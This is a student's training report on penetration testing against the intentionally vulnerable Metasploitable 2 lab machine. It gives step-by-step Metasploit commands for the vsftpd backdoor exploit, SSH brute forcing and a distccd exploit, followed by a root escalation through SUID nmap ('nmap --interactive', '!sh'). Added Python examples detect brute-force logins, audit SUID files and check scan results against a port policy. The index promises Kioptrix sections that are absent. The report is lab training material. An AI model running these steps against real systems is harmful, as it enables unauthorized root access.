
Hacking

Uploaded by

gillbrian2105

A Report of Four Week Training At

CHANDIGARH ENGINEERING COLLEGE,


CGC, LANDRAN, MOHALI

BACHELOR OF TECHNOLOGY

TRAINING PERIOD: MAY-JUNE 2025


(ARTIFICIAL INTELLIGENCE AND MACHINE
LEARNING)

Submitted By
Name: BRIAN GILL
Roll No.: 2336803
Semester: 5TH
Branch: BTECH CSE
Date of Submissions: 07/07/2025
DEPARTMENT OF EMERGING TECHNOLOGIES
CHANDIGARH ENGINEERING COLLEGE-CGC

INDEX

S. NO.   CONTENT                                     DATE   REMARKS
1        Introduction to Kali Linux
2        Introduction to Metasploitable 2
3        Tools Used for Metasploitable 2
4        Attacks Performed
  I      FTP Attack
  II     Brute Force Attack
  III    Privilege Escalation Attack
5        Introduction of Kioptrix Level 1
6        Tools Used for Kioptrix Level 1
7        Attack on Kioptrix Level 1 – Root Access

1. Introduction to KALI LINUX

About Kali Linux


Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-
based Linux distribution which allows users to perform advanced penetration
testing and security auditing. It runs on multiple platforms and is freely
available and accessible to both information security professionals and
hobbyists.
This distribution has several hundred tools, configurations, and scripts with
industry-specific modifications that allow users to focus on tasks such as
computer forensics, reverse engineering, and vulnerability detection, instead of
dealing with unrelated activities.
This distribution is specifically tailored to the needs of experienced penetration
testers, so all documentation on this site assumes prior knowledge of, and
familiarity with, the Linux operating system in general. Please see "Should I
Use Kali Linux?" for more details on what makes Kali unique.
If you wish to review the features of Kali Linux, please see the following page:
Kali Linux Overview.

Kali Linux Features


Completely Free: Kali Linux can be used for free and never asks for
money.

Open Source: Not only is the source code available in the public domain,
but also you are free to change anything.

FHS Compliant: According to an ordinary Linux directory scheme, Kali
Linux uses a basic system of files and folders.

Device Compatibility: It supports a variety of hardware and wireless
devices.

Custom Kernel: Along with the regular kernel, there is a kernel with
injection ability, which is indeed very applicable in a wireless test.

Secure Development: A team that has a secure development process has
developed it.

GPG Signed Packages: Its package authenticity and integrity are ensured
with the help of GPG signing.

Multi-Language Support: It is available in various languages to cater to a
diverse global audience.

Fully Customizable: The most demanding users who want to change
everything from the UI to the kernel can enjoy it.

ARM Support: The software can run on ARM platform-based devices
such as Raspberry Pi and BeagleBone.

System Requirements for Kali Linux


Component    Requirement
CPU          1 GHz single-core processor
RAM          2 GB
Storage      20 GB of free disk space
Graphics     Basic graphics support
Boot Mode    Legacy or UEFI

Kali Linux Interface


2. Introduction to Metasploitable 2

About Metasploitable 2
Metasploitable 2 is the intentionally vulnerable target machine for evaluating
Metasploit. Taking your first steps with Metasploit can be difficult, especially
if you don't want to conduct your first penetration test on your production
network. Metasploitable is a virtual machine based on Linux that contains
several intentional vulnerabilities for you to exploit. Metasploitable is
essentially a penetration testing lab in a box, available as a VMware virtual
machine (VMX). (The Metasploitable login is "msfadmin"; the password is also
"msfadmin".) Metasploitable is created by the Rapid7 Metasploit team. By
downloading Metasploitable from Rapid7.com, you'll be sure to get the latest,
clean version of the vulnerable machine, plus you'll get it from Rapid7's
lightning-fast download servers.

Key Features
Pre-installed vulnerable services (e.g., FTP, SSH, HTTP, Samba)

Weak passwords and outdated software versions

Ideal target for tools like Nmap, Metasploit, Hydra, Nikto, and others

Supports both manual and automated exploitation

Runs as a virtual machine on platforms like VMware or VirtualBox

Default Services on Metasploitable 2


Some of the services that run on Metasploitable 2 include:

Port   Service        Description
21     vsftpd         Vulnerable FTP server
22     OpenSSH        SSH service
23     Telnet         Insecure remote login
25     SMTP           Mail service
80     Apache HTTPD   Vulnerable web applications
139    Samba          Windows File Sharing
3306   MySQL          Database server

These misconfigured services are what make Metasploitable 2 an excellent
target for exploitation and security training.

Why Use Metasploitable 2?


Safe for experimentation without legal or ethical concerns

Works perfectly with Kali Linux tools

Helps in understanding how vulnerabilities are exploited

Useful in CTFs (Capture the Flag) and cybersecurity training sessions


How to Set It Up

Download Metasploitable 2 ISO from Rapid7’s official site

Import into VirtualBox or VMware.

Ensure NAT Network or Host-Only Adapter is set so both Kali and
Metasploitable are on the same subnet.

Boot the VM and note the IP address shown after login.

3. Tools Used for Metasploitable 2

To perform penetration testing on Metasploitable 2, a range of powerful and
essential tools available within Kali Linux are used. These tools form the
backbone of a typical ethical hacking workflow. Each tool plays a critical role
in the Information Gathering, Vulnerability Assessment, Exploitation, and
Post-Exploitation phases of penetration testing.

The process begins by using network discovery tools to identify the target
machine within the local network. Once the target is identified, port scanning
tools help reveal open ports and the services running on them. After mapping
the attack surface, vulnerability scanners and manual enumeration tools help
uncover misconfigurations and weak points. Finally, exploitation frameworks
are used to take advantage of the vulnerabilities and gain access to the target
system.

These tools not only automate many tasks but also provide deep insights into
the security posture of a system. By using them effectively, ethical hackers can
simulate real-world attack scenarios in a controlled environment like
Metasploitable 2, improving their skills in detecting and exploiting system flaws
while learning how to secure them in real-world deployments.

Netdiscover

About Netdiscover
Netdiscover is an active/passive address reconnaissance tool, mainly developed
for wireless networks without a DHCP server, when you are wardriving. It
can also be used on hub/switched networks.

Built on top of libnet and libpcap, it can passively detect online hosts, or search
for them, by actively sending ARP requests.

Netdiscover can also be used to inspect your network ARP traffic, or find
network addresses using auto scan mode, which will scan for common local
networks.

Netdiscover uses the OUI table to show the vendor of each MAC address
discovered and is very useful for security checks or in pentests.

Usage:
Launches a scan on the local subnet.

Displays IP, MAC address, and manufacturer of detected devices.

Finding the IP address of Metasploitable 2 on the same network as Kali
Linux

Command

Output
NMAP

About NMAP
Nmap ("Network Mapper") is a free and open source utility for network
discovery and security auditing. Many systems and network administrators also
find it useful for tasks such as network inventory, managing service upgrade
schedules, and monitoring host or service uptime. Nmap uses raw IP packets in
novel ways to determine what hosts are available on the network, what services
(application name and version) those hosts are offering, what operating systems
(and OS versions) they are running, what type of packet filters/firewalls are in
use, and dozens of other characteristics. It was designed to rapidly scan large
networks, but works fine against single hosts. Nmap runs on all major computer
operating systems, and official binary packages are available for Linux,
Windows, and Mac OS X.

Features
Supports advanced techniques like TCP/UDP scanning, OS and version
detection, and ping sweeps.

Can scan networks with hundreds of thousands of hosts.

Works on multiple operating systems, including Linux, Windows,
macOS, BSD, Solaris, and more.

Offers both command-line and graphical (GUI) versions

Available for free download with modifiable source code.

Includes manuals, tutorials, whitepapers, and even a full book.

Backed by an active developer and user community via mailing lists and
chat channels.

Recognized with multiple awards and featured in magazines, books, and
movies.

Downloaded by thousands daily; bundled in many Linux distributions.

Command and Output


Metasploit Framework

About Metasploit-Framework
The Metasploit Framework is a Ruby-based, modular penetration testing
platform that enables you to write, test, and execute exploit code. The
Metasploit Framework contains a suite of tools that you can use to test security
vulnerabilities, enumerate networks, execute attacks, and evade detection. At its
core, the Metasploit Framework is a collection of commonly used tools that
provide a complete environment for penetration testing and exploit
development.

Accessing MSFconsole
MSFconsole provides a command line interface to access and work with the
Metasploit Framework. The MSFconsole is the most commonly used interface to
work with the Metasploit Framework. The console lets you do things like scan
targets, exploit vulnerabilities, and collect data.

Features
Contains thousands of ready-to-use exploits for known vulnerabilities

Supports various payloads like reverse shell, bind shell, and Meterpreter

Enables post-exploitation tasks such as privilege escalation and data extraction

Includes auxiliary modules for scanning, fuzzing, and brute-force attacks

Integrates with tools like Nmap, Nessus, and Nikto

Offers a powerful command-line interface (msfconsole)

Supports database logging to manage hosts and vulnerabilities

Command
Output

4. Attacks performed on
Metasploitable 2

FTP ATTACK
Objective:
To exploit a known vulnerability in the vsftpd 2.3.4 FTP service running on
Metasploitable 2 using Metasploit Framework, and gain unauthorized shell
access to the target system.

Tools Used:
Netdiscover – Identify the Target IP

Nmap – To identify open FTP port.

Msfconsole – To launch the exploit module for vsftpd 2.3.4

Steps and Commands:


Step 1: Get root access using the command sudo su.

Step 2: Identify the Target IP using the command netdiscover.

Step 3: Scan the FTP server using the command nmap 10.0.2.6 -sV (the -sV
option is used for service and version detection).

Step 4: Launch the Metasploit console using the command msfconsole.

Step 5: Search for the exploit using the command search vsftpd.

Step 6: Use exploit number 1 using the command use 1.

Step 7: See the available options in the exploit using the command
show options.

Step 8: Set the RHOST using the command set RHOST 10.0.2.6.

Step 9: Set the payload using the command set payload cmd/unix/interact.

Step 10: Run the exploit using the command run.


Result:
A successful exploitation gives the attacker a remote shell with root privileges,
allowing full control over the system.

BRUTEFORCE ATTACK
Objective:
To perform a brute force attack on the SSH service (port 22) of Metasploitable 2
using Metasploit Framework, in order to find valid login credentials and gain
unauthorized access.

Tools Used:
Netdiscover – Identify the Target IP

Nmap – To identify open SSH port (Port 22).

Msfconsole – To automate brute-force attempts on SSH

Wordlists – Default or custom username/password wordlists

Steps and Commands:


Step 1: Get root access using the command sudo su.

Step 2: Identify the Target IP using the command netdiscover.

Step 3: Scan the Target for SSH using the command nmap -sV -p 22 10.0.2.6.

Step 4: Launch the Metasploit console using the command msfconsole.

Step 5: Search for the exploit using the command search ssh auxiliary login.

Step 6: Use exploit number 4 using the command use 1.

Step 7: See the available options in the exploit using the command
show options.

Step 8: Set the information and files using the commands
(user.txt and password.txt files needed)
set RHOST 10.0.2.6
set STOP_ON_SUCCESS true
set VERBOSE true
set USER_FILE /home/kali/Desktop/user.txt
set PASS_FILE /home/kali/Desktop/password.txt

Step 9: Run the exploit using the command run.

Metasploit will now start testing combinations. If it finds a valid credential, it
will display it.
Result:
Using Metasploit, we successfully brute-forced SSH login credentials for
Metasploitable 2.
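
The login attempts generated in Steps 8 and 9 are visible in the target's sshd authentication log. The following is an added example, not part of the original report, showing how that pattern can be detected; the log lines, the source addresses 10.0.2.15 and 10.0.2.20, the user alice and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth-log excerpt (illustrative, not captured from the lab).
SAMPLE_LOG = """\
Jun 10 10:00:01 target sshd[2101]: Failed password for root from 10.0.2.15 port 40122 ssh2
Jun 10 10:00:02 target sshd[2103]: Failed password for invalid user admin from 10.0.2.15 port 40124 ssh2
Jun 10 10:00:03 target sshd[2105]: Failed password for invalid user test from 10.0.2.15 port 40126 ssh2
Jun 10 10:00:04 target sshd[2107]: Failed password for msfadmin from 10.0.2.15 port 40128 ssh2
Jun 10 10:00:05 target sshd[2109]: Failed password for msfadmin from 10.0.2.15 port 40130 ssh2
Jun 10 10:00:06 target sshd[2111]: Accepted password for msfadmin from 10.0.2.15 port 40132 ssh2
Jun 10 10:05:00 target sshd[2140]: Failed password for alice from 10.0.2.20 port 51000 ssh2
Jun 10 10:05:09 target sshd[2142]: Accepted password for alice from 10.0.2.20 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2025):
    """Flag source IPs with >= threshold failed logins inside `window`, and
    record any login that later succeeds from a flagged IP."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    tried = defaultdict(set)      # ip -> usernames attempted
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Classic syslog timestamps carry no year, so one is supplied.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            tried[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                findings.setdefault(ip, {"users_tried": tried[ip], "success_after": []})
        elif ip in findings:
            findings[ip]["success_after"].append(user)
    return findings

if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, sorted(f["users_tried"]), "login succeeded for:", f["success_after"])
```

A single mistyped password followed by a successful login, as from 10.0.2.20 in the sample, stays below the threshold and is not reported.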

PRIVILEGE ESCALATION ATTACK
Objective:
To exploit a known vulnerability in the distccd service running on
Metasploitable 2 using Metasploit, leading to remote code execution and
root shell access.

Tools Used:
Netdiscover – Identify the Target IP

Nmap – To identify open distccd service port

Msfconsole – To exploit the vulnerable distccd service

Steps and Commands:


Step 1: Get root access using the command sudo su.

Step 2: Identify the target IP using the command netdiscover.

Step 3: Scan the target for distccd using the command
nmap 192.168.1.36 -p 3000-4000 -sV.

Step 4: Launch the Metasploit console using the command msfconsole.

Step 5: Search for the exploit using the command search distccd.

Step 6: Use exploit number 4 using the command use 0.

Step 7: See the available options in the exploit using the command
show options.

Step 8: Set the RHOST using the command set RHOST 192.168.1.36.

Step 9: See the available payload options using the command show payloads.

Step 10: Use exploit number 6 using the command set payload 6.

Step 11: Run the exploit using the command run.

Step 12: As we are not a root user, run the following commands to get
root access:
python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
nmap --interactive
!sh
whoami
id
Result:
We successfully gained root access to Metasploitable 2 by chaining a remote
code execution vulnerability in distccd with manual privilege escalation
techniques.
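
The escalation in Step 12 depends on nmap being installed setuid root. The following is an added example, not part of the original report, that audits a directory tree for the same condition from the administrator's side; the watchlist entries other than nmap and the function names are assumptions made for illustration.

```python
import os
import stat

# Programs able to run arbitrary commands. nmap is the binary used in Step 12;
# the other names are assumptions added for illustration.
SHELL_CAPABLE = {"nmap", "sh", "bash", "python", "perl", "find", "vim"}

def classify(path, mode, uid):
    """Rate one file from its stat data: 'critical', 'review' or None."""
    # Only regular files with the setuid bit matter (find's -type f -perm -u=s).
    if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
        return None
    # A root-owned setuid program that can spawn commands yields a root shell.
    if uid == 0 and os.path.basename(path) in SHELL_CAPABLE:
        return "critical"
    return "review"

def audit_suid(root="/"):
    """Walk `root` and return sorted (level, path) pairs for setuid files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)      # lstat: do not follow symlinks
            except OSError:
                continue                 # vanished or unreadable entry
            level = classify(path, st.st_mode, st.st_uid)
            if level:
                findings.append((level, path))
    return sorted(findings)

if __name__ == "__main__":
    for level, path in audit_suid("/usr"):
        print(f"{level:8} {path}")
```

Entries rated critical should have the setuid bit removed or the package removed; entries rated review are compared against the distribution's expected setuid set.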
Summary of Attacks on Metasploitable 2
We have successfully performed three major types of attacks on the
Metasploitable 2 virtual machine using Kali Linux tools and Metasploit
Framework. These included:

FTP Attack – Exploiting a backdoor vulnerability in vsftpd 2.3.4 to gain
shell access.

Brute Force Attack – Cracking SSH login credentials using Metasploit’s
auxiliary module.

Privilege Escalation Attack – Gaining a limited shell via the vulnerable
distccd service and then escalating privileges to root by manually
exploiting system weaknesses.

These attacks demonstrate how vulnerable services and misconfigurations can
lead to complete system compromise. The process also highlights the
importance of regular patching, strong password policies, and minimizing
exposure of unnecessary services.
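
The patching and exposure points above can be checked with the same nmap -sV scan used in Step 3 of the FTP attack. The following is an added example, not part of the original report, that reads the scan's port table and reports known-bad versions, cleartext protocols and ports outside an allowlist; the sample scan text is constructed (only the vsftpd version comes from the report) and the policy values are hypothetical.

```python
import re

# Constructed `nmap -sV` port table; only the vsftpd version is taken from the
# report, the remaining rows are placeholders without version numbers.
SAMPLE_SCAN = """\
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 2.3.4
22/tcp   open   ssh     OpenSSH
23/tcp   open   telnet  Linux telnetd
25/tcp   closed smtp
80/tcp   open   http    Apache httpd
3306/tcp open   mysql   MySQL
"""

ROW_RE = re.compile(
    r"^(?P<port>\d+)/(?:tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$")

# Hypothetical site policy used for this example.
ALLOWED_PORTS = {22, 80}
CLEARTEXT = {"ftp", "telnet"}
KNOWN_BAD = {"vsftpd 2.3.4": "backdoored release used in the FTP attack"}

def audit_scan(scan_text):
    """Return (port, issue, detail) tuples for every open port that breaks policy."""
    findings = []
    for line in scan_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or m["state"] != "open":
            continue                      # header rows, closed and filtered ports
        port, service, version = int(m["port"]), m["service"], m["version"].strip()
        for bad, why in KNOWN_BAD.items():
            if version.startswith(bad):
                findings.append((port, "known-bad version", f"{bad}: {why}"))
        if service in CLEARTEXT:
            findings.append((port, "cleartext protocol", service))
        if port not in ALLOWED_PORTS:
            findings.append((port, "not in allowlist", service))
    return findings

if __name__ == "__main__":
    for port, issue, detail in audit_scan(SAMPLE_SCAN):
        print(f"{port:<5} {issue:<20} {detail}")
```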
